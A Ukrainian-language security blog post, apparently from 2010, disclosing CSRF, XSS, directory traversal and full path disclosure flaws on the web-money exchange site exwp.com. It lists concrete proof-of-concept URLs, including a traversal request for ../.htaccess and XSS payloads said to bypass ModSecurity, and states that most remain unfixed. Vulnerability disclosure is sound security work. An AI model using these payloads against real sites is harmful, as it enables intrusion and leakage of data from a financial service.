Уразливості на exwp.com

15:24 25.11.2010

07.04.2010

У вересні, 27.09.2009, я знайшов Cross-Site Request Forgery, Cross-Site Scripting, Directory Traversal та Full path disclosure уразливості на проекті http://exwp.com (обмінник веб грошей). Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно обмінників веб грошей я писав про уразливості на www.popolni.com.ua.

Детальна інформація про уразливості з’явиться пізніше.

25.11.2010

CSRF:

http://exwp.com/firebook/cash/?URLproxy=http://site;

Можливі CSRF та DoS атаки на інші сайти.

XSS (з використанням методів обходу ModSecurity):

http://exwp.com/firebook/cash/?URLproxy=%3Cxss%3E

http://exwp.com/guestbook/index.html?answer=%3Cxss%3E

http://exwp.com/guestbook/index.html?answer=guestbook/guest/1274704418_EX00.html;page=%22%3E%3Cxss%3E

Directory Traversal:

http://exwp.com/firebook/cash/?param=1;show=../.htaccess;

http://exwp.com/guestbook/index.html?answer=guestbook/guest/%2E%2E/index.html

Full path disclosure:

http://exwp.com/firebook/cash/?param=1;show=param.txt;

http://exwp.com/guestbook/index.html?answer=guestbook/guest/1

Дані уразливості досі не виправлені. Лише одна Directory Traversal виправлена, але в ній витоки інформації все ще можливі в папках в кореневій директорії веб сервера (де не заборонений доступ).


Leave a Reply

You must be logged in to post a comment.